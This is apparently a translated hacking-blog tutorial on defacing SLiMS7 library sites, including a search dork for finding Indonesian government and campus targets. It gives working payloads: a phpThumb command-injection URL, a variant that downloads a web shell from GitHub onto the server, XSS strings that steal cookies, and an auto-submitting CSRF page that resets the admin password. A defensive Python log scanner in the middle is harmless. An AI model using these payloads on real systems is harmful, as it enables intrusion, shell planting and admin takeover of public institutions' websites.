
Deface Slims7 phpThumb Command Injection RCE




Yup, this time I'm going to share with you how to deface a site using a vulnerability in SLiMS7, specifically in its phpThumb file... let's keep it simple here...

SLiMS is an open-source library management system that won the Indonesia OSS 2009 ICT Award. SLiMS is widely used in Indonesia, especially in government and campus environments.

If you search Google with the keyword below, you will find hundreds of government and campus websites running SLiMS:

site:id intext:"Powered by Slims"

Reference: https://medium.com/@iqbalxhalim/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf-66e42fb7d1fd

1. Remote Code Execution via the phpThumb lib

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;ls -la; &phpThumbDebug=9

If the target is vulnerable, the response will look like this:

(screenshot: website response)



If you want to upload a shell, just wget it with the following command:

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php; &phpThumbDebug=9
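As an added defender's example (not code from the original post or from the SLiMS project), here is a small Python scanner that runs over constructed access-log lines and flags phpThumb requests whose fltr[] value carries shell separators or smuggled ImageMagick options, or that switch on phpThumbDebug. The log format, sample lines and regexes are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from any real server). The first one
# mirrors the fltr[] injection pattern discussed above; the other two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20%3Bls%20-la%3B&phpThumbDebug=9 HTTP/1.1" 200 1234
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /lib/watermark/phpThumb.php?src=cover.jpg&fltr[]=blur|3 HTTP/1.1" 200 5678
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?p=show_detail&id=1 HTTP/1.1" 200 999
"""

# Common-log-format request line: client IP and the request target (assumed format).
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Shell separators and command substitution have no place in a phpThumb filter spec
# ('|' is legitimate there: it separates the filter name from its arguments).
SHELL_META_RE = re.compile(r'[;&`\n]|\$\(')
# Whitespace followed by a dash smuggles extra ImageMagick options into the filter string.
OPTION_RE = re.compile(r'\s-[A-Za-z]')

def inspect_request(target):
    """Return the reasons this request looks like phpThumb fltr abuse (empty list if clean)."""
    parts = urlsplit(target)
    if not parts.path.endswith('/phpThumb.php'):
        return []
    reasons = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.startswith('fltr'):
            if SHELL_META_RE.search(value):
                reasons.append('shell metacharacter in fltr')
            if OPTION_RE.search(value):
                reasons.append('injected ImageMagick option in fltr')
        elif key == 'phpThumbDebug':
            reasons.append('phpThumbDebug enabled')
    return sorted(set(reasons))

def scan_log(text):
    """Return (client_ip, path, reasons) for every suspicious request in an access log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        ip, target = m.groups()
        reasons = inspect_request(target)
        if reasons:
            hits.append((ip, target.split('?', 1)[0], reasons))
    return hits

if __name__ == '__main__':
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f'{ip} {path}: {", ".join(reasons)}')
```

Hits on a real log are worth pairing with the HTTP status and response size, since a 200 with an unusually large body on phpThumb.php is what a successful debug dump looks like.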

2. XSS (Cross-Site Scripting)

- Reflected XSS
http://localhost/slims7/index.php?p=show_detail&id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://localhost/slims7/index.php?select_lang=id_ID%22%20onmouseover=alert%28document.cookie%29%3E

- Stored XSS in the memberID parameter using the POST method
http://localhost/slims7/?p=visitor
memberID = %22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

- Cookie stealing can be carried out when the admin opens the page Reporting -> Visitor list:
http://localhost/slims7/admin/modules/reporting/customs/visitor_list.php

3. CSRF (Cross-Site Request Forgery)
A simple CSRF script to update the admin password via:
http://localhost/slims7/admin/modules/system/app_user.php?changecurrent=true
-----------own.html-------------------------------------------------
 <iframe  src="silent.html" onLoad="" style="visibility:hidden;display:none"></iframe>
--------------------------------------------------------------------
----------silent.html-----------------------------------------------
 <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script>
 <body  onLoad="autosubmit()">
 <form action="http://localhost/slims7/admin/modules/system/app_user.php?changecurrent=true" name="mainForm" id="ChangeSubmit" class="disabled" method="post" enctype="multipart/form-data">
 <input type="hidden" name="userName" id="userName" value="admin" >
 <input type="hidden" name="realName" id="realName" value="Admin" >
 <input type="hidden" name="passwd1" id="passwd1" value="adminku" >
 <input type="hidden" name="passwd2" id="passwd2" value="adminku">
 <input name="updateRecordID" id="updateRecordID" value="1" type="hidden">
 <input name="saveData" id="saveData" value="Update" type="hidden">
 </form>
--------------------------------------------------------------------


